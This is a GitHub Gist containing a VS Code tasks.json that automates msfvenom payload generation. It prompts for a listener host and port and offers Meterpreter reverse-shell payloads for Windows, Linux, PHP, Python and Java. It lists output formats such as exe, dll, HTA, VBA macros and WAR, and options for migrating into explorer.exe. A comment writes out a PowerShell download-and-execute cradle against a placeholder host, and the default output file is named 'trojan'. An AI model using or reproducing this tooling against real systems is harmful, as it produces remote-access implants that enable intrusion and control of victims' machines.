Created
January 25, 2024 04:01
-
-
Save Esonhugh/750f4e1d91b320e3960140d470c93c08 to your computer and use it in GitHub Desktop.
vscode task based msfvenom payload generation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"version": "2.0.0", | |
"tasks": [ | |
{ | |
"label": "msfvenom payload creating", | |
"type": "shell", | |
"detail": "msfvenom payload creating task", | |
"problemMatcher": [], | |
"command": [ | |
"msfvenom", | |
"-p", | |
"${input:msfvenom-payload}", | |
"LHOST=${input:msfvenom-lhost}", | |
"LPORT=${input:msfvenom-lport}", | |
"${input:msfvenom-payload-advanced-options}", | |
"-o", | |
"${input:msfvenom-output}", | |
"-f", | |
"${input:msfvenom-format}", | |
], | |
"presentation": { | |
"echo": true, | |
"reveal": "always", | |
"focus": false, | |
"panel": "new", | |
"showReuseMessage": false, | |
"clear": true, | |
"close": false | |
}, | |
"runOptions": { | |
"runOn": "default" | |
}, | |
"isBackground": false, | |
"promptOnClose": true, | |
"hide": false, | |
} | |
], | |
"inputs": [ | |
{ | |
"id": "msfvenom-payload", | |
"type": "pickString", | |
"description": "Select the payload", | |
"options": [ | |
// Order with the most used payloads first | |
// Staged first, better stageless | |
"windows/x64/meterpreter/reverse_tcp", | |
"windows/meterpreter/reverse_tcp", | |
"linux/x64/meterpreter/reverse_tcp", | |
"linux/x86/meterpreter/reverse_tcp", | |
"php/meterpreter/reverse_tcp", | |
"python/meterpreter/reverse_tcp", | |
"windows/meterpreter/reverse_http", | |
"windows/x64/meterpreter/reverse_http", | |
"windows/meterpreter/reverse_https", | |
"windows/x64/meterpreter/reverse_https", | |
"java/meterpreter/reverse_tcp", | |
] | |
}, | |
{ | |
"id": "msfvenom-format", | |
"type": "pickString", | |
"description": "Select the format of the payload", | |
"options": [ | |
// executable first, script second, web hta third | |
// "# DONOT Choose this.(psh is powershell script with loader,raw is used for python java php pyloads)", | |
"exe", | |
"elf", | |
"psh # psh is powershell payload with loader using `IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:80/<output>.ps1');` to load in memory ", | |
"dll", | |
"hta-psh", | |
"psh-cmd", | |
"psh-net", | |
"psh-reflection", | |
"elf-so", | |
"exe-service", | |
"raw # php python java meterpreter will meet error if you choose like php python", | |
"raw | xxd -i # you can use this to get shellcode (but you need output in /dev/stdout)", | |
"jsp", | |
"jar", | |
"war", | |
"pl", | |
"asp", | |
"aspx", | |
"msi", | |
"python-reflection", | |
"vba", | |
"vba-exe", | |
"vba-psh", | |
"vbs", | |
] | |
}, | |
{ | |
"id": "msfvenom-lhost", | |
"type": "promptString", | |
"description": "Enter the LHOST", | |
"default": "10.10.", | |
}, | |
{ | |
"id": "msfvenom-lport", | |
"type": "promptString", | |
"description": "Enter the LPORT", | |
"default": "6789", | |
}, | |
{ | |
"id": "msfvenom-payload-advanced-options", | |
"type": "pickString", | |
"description": "Enter the advanced options", | |
"default": "", | |
"options": [ | |
"", | |
"PrependMigrate=true PrependMigrateProc=explorer.exe", | |
"PrependFork=true", | |
"PrependSetuid=true", | |
"PrependSetuid=true PrependFork=true", | |
] | |
}, | |
{ | |
"id": "msfvenom-output", | |
"type": "promptString", | |
"description": "Enter the output filename. if you put /dev/stdout here, the output will be printed to the terminal", | |
"default": "${workspaceFolder}/trojan", | |
} | |
] | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment